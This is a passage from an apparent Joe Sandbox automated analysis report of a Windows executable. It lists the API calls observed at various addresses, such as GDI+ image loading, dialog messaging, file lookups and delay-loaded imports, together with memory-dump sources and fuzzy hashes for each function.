                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: DeleteFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2643169976-0
                                                              • Opcode ID: 702dad2c748105d681475af7b21a8b110035b233983998eca75c8c2832acc155
                                                              • Instruction ID: 2f79ef0301842262ea72827981a5a2498914b174f97a3358ea1531bf20c707a4
                                                              • Opcode Fuzzy Hash: 702dad2c748105d681475af7b21a8b110035b233983998eca75c8c2832acc155
                                                              • Instruction Fuzzy Hash: ECE02231200318ABEB019F21EC01FDE375CAB0C7CAF884062B804D2190EB25DE94DA68
                                                              APIs
                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00452641,000000FF), ref: 0043ACB0
                                                              • CoUninitialize.COMBASE(?,?,?,?,00452641,000000FF), ref: 0043ACB5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: GdiplusShutdownUninitialize
                                                              • String ID:
                                                              • API String ID: 3856339756-0
                                                              • Opcode ID: c903c960297925f6d140d429e8955855cdab56d56e99db30cd48c977c6e29ff5
                                                              • Instruction ID: d080fc0d770807f59312c65ffe1b814f97be8b4453972207a25d407c96fc7455
                                                              • Opcode Fuzzy Hash: c903c960297925f6d140d429e8955855cdab56d56e99db30cd48c977c6e29ff5
                                                              • Instruction Fuzzy Hash: 8CE03072544A50EBC6019F59DC46B49FBA8FB48A21F10426AF416D36A1CB74A800CA98
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,?,?,0042A23A,?,0042755C,?,?,?,?), ref: 0042A254
                                                                • Part of subcall function 0042BB03: _wcslen.LIBCMT ref: 0042BB27
                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0042A23A,?,0042755C,?,?,?,?), ref: 0042A280
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2673547680-0
                                                              • Opcode ID: 9ebeff21be16f7a8b66ea5ac8e78da1969f8f4732bef79e05a952df2fa1b78a9
                                                              • Instruction ID: fe92ae8de56cff3df9640f6b1d51596a8bb23a3c718187111eb1919583478909
                                                              • Opcode Fuzzy Hash: 9ebeff21be16f7a8b66ea5ac8e78da1969f8f4732bef79e05a952df2fa1b78a9
                                                              • Instruction Fuzzy Hash: B0E092316002249BCB10AB65DC05BD97B58AB097E6F4442B2FD44E32D5D774DE44CAF9
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 0043DEEC
                                                                • Part of subcall function 00424092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004240A5
                                                              • SetDlgItemTextW.USER32(00000065,?), ref: 0043DF03
                                                                • Part of subcall function 0043B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0043B579
                                                                • Part of subcall function 0043B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0043B58A
                                                                • Part of subcall function 0043B568: IsDialogMessageW.USER32(00010484,?), ref: 0043B59E
                                                                • Part of subcall function 0043B568: TranslateMessage.USER32(?), ref: 0043B5AC
                                                                • Part of subcall function 0043B568: DispatchMessageW.USER32(?), ref: 0043B5B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                              • String ID:
                                                              • API String ID: 2718869927-0
                                                              • Opcode ID: 6b37ea5cb58f5dea004f5a0196b07a2ca85411bae2ee2f9d6b6784673efada36
                                                              • Instruction ID: 6a8496181704003083ab56ff6de27eb0ae4440e92d67d9d2a886bd3defe115fb
                                                              • Opcode Fuzzy Hash: 6b37ea5cb58f5dea004f5a0196b07a2ca85411bae2ee2f9d6b6784673efada36
                                                              • Instruction Fuzzy Hash: DAE09B7150025826DF01AB62DC06F9E376C9B097C9F44086AB300DB0E2E97DDA50876A
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00430836
                                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0042F2D8,Crypt32.dll,00000000,0042F35C,?,?,0042F33E,?,?,?), ref: 00430858
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystem
                                                              • String ID:
                                                              • API String ID: 1175261203-0
                                                              • Opcode ID: d3776bc8526c1273e75f65e5c01c074c6cf3edc82e76398f02c2dedfd8a92198
                                                              • Instruction ID: f98fb8804bb52c724b40fc343cd3d85455d874e60a3238c9f1ecef20a7339899
                                                              • Opcode Fuzzy Hash: d3776bc8526c1273e75f65e5c01c074c6cf3edc82e76398f02c2dedfd8a92198
                                                              • Instruction Fuzzy Hash: F1E012765002286BDB11AB959C05FDA77ACEF0D7D2F040066B645D2145D678DA84CAA8
                                                              APIs
                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0043A3DA
                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0043A3E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: BitmapCreateFromGdipStream
                                                              • String ID:
                                                              • API String ID: 1918208029-0
                                                              • Opcode ID: b6f6b2812a1a96ad07f91aef9e715d17ed459869edf532f849d47c03503aad5f
                                                              • Instruction ID: 19678c1c9f82e007b7728394c975a90c0109691add2694b625e1fb85b62de38a
                                                              • Opcode Fuzzy Hash: b6f6b2812a1a96ad07f91aef9e715d17ed459869edf532f849d47c03503aad5f
                                                              • Instruction Fuzzy Hash: 09E0ED72501218EBCB10DF56C541B99BBE8EB08365F10C05BA89697241E378AE44DB95
                                                              APIs
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00442BAA
                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00442BB5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                              • String ID:
                                                              • API String ID: 1660781231-0
                                                              • Opcode ID: f3c26d0ad36e199e973956b0ad232297bc00f56f59587217f732eb431076a7dd
                                                              • Instruction ID: d77f576c65b42b0e22032742b3b549ebcf04a5a6c2ec0c8c8eb4c969d71598eb
                                                              • Opcode Fuzzy Hash: f3c26d0ad36e199e973956b0ad232297bc00f56f59587217f732eb431076a7dd
                                                              • Instruction Fuzzy Hash: D7D0A735554340247C142E723B025492745DD41B7A7F0069FF420959C1DADCE240511D
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ItemShowWindow
                                                              • String ID:
                                                              • API String ID: 3351165006-0
                                                              • Opcode ID: f11cb8a1726c836ff94f9816cd741c396e220fdcdb50f8becfd43ad090927ec3
                                                              • Instruction ID: 10d3fb6fa5e6712b9a6e6bfe7b5641c65fbf9f19f9e05453a4f78fd5d21db211
                                                              • Opcode Fuzzy Hash: f11cb8a1726c836ff94f9816cd741c396e220fdcdb50f8becfd43ad090927ec3
                                                              • Instruction Fuzzy Hash: F8C0123205C200BECB010FB4DC0DC2FBBA8ABA5B12F04CD2CB0A5C0060E238C910DB11
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 505456f663d063de25004ae9620d577045463245f504dfa3a84f96cf86f98e62
                                                              • Instruction ID: 101a5e24d3f91e8fcbfdaa50aa28b0790ea2bd5e1715c1e18f3e64c0fad514f5
                                                              • Opcode Fuzzy Hash: 505456f663d063de25004ae9620d577045463245f504dfa3a84f96cf86f98e62
                                                              • Instruction Fuzzy Hash: 8DC1D630B002649FEF15CF24D494BAA7FB5AF25310F4801BBEC459B3A2DB38A945CB65
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 9616ead88e993dd6a766fbe5f0e9e8353b465d03b0521fb98a6c258b65e383f3
                                                              • Instruction ID: e73a02378ef37432267300165bae69ea9f28bade0fccbea448ead2beadff2d23
                                                              • Opcode Fuzzy Hash: 9616ead88e993dd6a766fbe5f0e9e8353b465d03b0521fb98a6c258b65e383f3
                                                              • Instruction Fuzzy Hash: FF71D371600B549EDB35DF71D8419E7B7F9AF14305F81082FE6AB83241DA3A6648CF19
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00428289
                                                                • Part of subcall function 004213DC: __EH_prolog.LIBCMT ref: 004213E1
                                                                • Part of subcall function 0042A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0042A598
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: H_prolog$CloseFind
                                                              • String ID:
                                                              • API String ID: 2506663941-0
                                                              • Opcode ID: 88ad6f9256bd7379f83de57de686fc988454281e4b0deb2263ddfaa04eda6d42
                                                              • Instruction ID: 9db95290f32989cfea56acb632f040ab6bf6c4959ee5db1d62cb55ac2da37551
                                                              • Opcode Fuzzy Hash: 88ad6f9256bd7379f83de57de686fc988454281e4b0deb2263ddfaa04eda6d42
                                                              • Instruction Fuzzy Hash: CC41E771A052789ADB20EB61DC51AEEB378AF14304F8404EFE44A97193EB796EC5CB14
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 004213E1
                                                                • Part of subcall function 00425E37: __EH_prolog.LIBCMT ref: 00425E3C
                                                                • Part of subcall function 0042CE40: __EH_prolog.LIBCMT ref: 0042CE45
                                                                • Part of subcall function 0042B505: __EH_prolog.LIBCMT ref: 0042B50A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 63c34aa18f2da00dab460fab2c33152e86bc60ae0d12f54e67ad6e324558693e
                                                              • Instruction ID: 1bbc9be3fe2c2347276df1cd5f1e516d81790d90cedda3a30b7c598919bfa3d5
                                                              • Opcode Fuzzy Hash: 63c34aa18f2da00dab460fab2c33152e86bc60ae0d12f54e67ad6e324558693e
                                                              • Instruction Fuzzy Hash: E4414CB0A05B409EE724DF3A8885AE6FBE5BF18304F50496FD5EE83292C7356654CB14
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 004213E1
                                                                • Part of subcall function 00425E37: __EH_prolog.LIBCMT ref: 00425E3C
                                                                • Part of subcall function 0042CE40: __EH_prolog.LIBCMT ref: 0042CE45
                                                                • Part of subcall function 0042B505: __EH_prolog.LIBCMT ref: 0042B50A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 1e9a275a8d3285128a8ce731f96b75be44b1ba0001856ef2f73e5af1283c8b43
                                                              • Instruction ID: 5f1d93aeef74ec4bc9f3ed370ccb1700e6c024db284b231edc2b0f533b4f51f8
                                                              • Opcode Fuzzy Hash: 1e9a275a8d3285128a8ce731f96b75be44b1ba0001856ef2f73e5af1283c8b43
                                                              • Instruction Fuzzy Hash: D4415AB0905B409AE724DF3A8885AE6FBE5BF28304F50496FD5EE83282C7352654CB14
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0043B098
                                                                • Part of subcall function 004213DC: __EH_prolog.LIBCMT ref: 004213E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0044ACF8
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID:
                                                              • API String ID: 190572456-0
                                                              APIs
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00443C3F
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID:
                                                              • API String ID: 190572456-0
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0044CA2C,00000000,?,00446CBE,?,00000008,?,004491E0,?,?,?), ref: 00448E38
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00425AC2
                                                                • Part of subcall function 0042B505: __EH_prolog.LIBCMT ref: 0042B50A
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              APIs
                                                                • Part of subcall function 0042A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0042A592,000000FF,?,?), ref: 0042A6C4
                                                                • Part of subcall function 0042A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0042A592,000000FF,?,?), ref: 0042A6F2
                                                                • Part of subcall function 0042A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0042A592,000000FF,?,?), ref: 0042A6FE
                                                              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0042A598
                                                              Similarity
                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                              • String ID:
                                                              • API String ID: 1464966427-0
                                                              APIs
                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 00430E3D
                                                              Similarity
                                                              • API ID: ExecutionStateThread
                                                              • String ID:
                                                              • API String ID: 2211380416-0
                                                              APIs
                                                              • GdipAlloc.GDIPLUS(00000010), ref: 0043A62C
                                                                • Part of subcall function 0043A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0043A3DA
                                                              Similarity
                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                              • String ID:
                                                              • API String ID: 1915507550-0
                                                              APIs
                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00431B3E), ref: 0043DD92
                                                                • Part of subcall function 0043B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0043B579
                                                                • Part of subcall function 0043B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0043B58A
                                                                • Part of subcall function 0043B568: IsDialogMessageW.USER32(00010484,?), ref: 0043B59E
                                                                • Part of subcall function 0043B568: TranslateMessage.USER32(?), ref: 0043B5AC
                                                                • Part of subcall function 0043B568: DispatchMessageW.USER32(?), ref: 0043B5B6
                                                              Similarity
                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                              • String ID:
                                                              • API String ID: 897784432-0
                                                              APIs
                                                              • DloadProtectSection.DELAYIMP ref: 0043E5E3
                                                              Similarity
                                                              • API ID: DloadProtectSection
                                                              • String ID:
                                                              • API String ID: 2203082970-0
                                                              APIs
                                                              • GetFileType.KERNELBASE(000000FF,004297BE), ref: 004298C8
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID:
                                                              • API String ID: 3081899298-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E3FC
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: eac063e7c812e195c601dadc967b6c4b240e0f98cbbf0fb2919edf522a5f0f9c
                                                              • Instruction ID: 5a88ea1abd0556fda34ce9b13e960947c61632b4d5fd53251a3cd28654403e34
                                                              • Opcode Fuzzy Hash: eac063e7c812e195c601dadc967b6c4b240e0f98cbbf0fb2919edf522a5f0f9c
                                                              • Instruction Fuzzy Hash: B0B092A125A100AC2108A1061802D3A0248C18AB16730E42FBC04E20C1D848490A093B
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E3FC
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 58dd3a3812c94402a28b7092546c927ffe2526ec2b97d95a3aae8a074097f462
                                                              • Instruction ID: 67186025804ca6d4dc2de39e1a447055449b3efc9691279abaf0b35ed51a17ec
                                                              • Opcode Fuzzy Hash: 58dd3a3812c94402a28b7092546c927ffe2526ec2b97d95a3aae8a074097f462
                                                              • Instruction Fuzzy Hash: EDB092A125A100AC210861061902D3A0248C18AB16730E42FB904E60C19848090A093B
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E3FC
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
